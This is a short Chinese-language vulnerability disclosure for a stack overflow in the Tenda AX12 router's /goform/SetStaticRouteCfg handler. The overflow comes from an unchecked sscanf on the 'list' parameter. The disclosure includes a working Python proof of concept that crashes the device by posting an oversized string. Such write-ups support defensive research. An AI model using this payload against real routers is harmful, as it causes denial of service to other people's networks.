|
影响设备:Tenda-AX12 V22.03.01.21_CN( https://www.tenda.com.cn/download/detail-3237.html ) 漏洞类型:堆栈溢出 影响:拒绝服务 (DoS) 漏洞描述 该漏洞位于/goform/SetStaticRouteCfg影响Tenda-AX12 V22.03.01.21_CN最新版本的页面( https://www.tenda.com.cn/download/detail-3237.html ) 该sub_42E328函数存在堆栈溢出漏洞。 首先,这个函数调用sub_42E030函数。 在sub_42E030函数中: 该v3变量直接从http请求参数中获取list。 然后v3将通过函数拼接到堆栈,sscanf没有任何安全检查,导致堆栈溢出。 因此,通过/goform/SetStaticRouteCfg使用 long发布页面list,攻击者可以轻松执行拒绝服务 (DoS)。 POC 拒绝服务 (DoS) 的 Poc: 导入 请求 import requests url = "http://192.168.0.1/goform/SetStaticRouteCfg" list_data = 'a'*0x1000 + '~' r = requests.post(url, data={'list': list_data}) print(r.content) |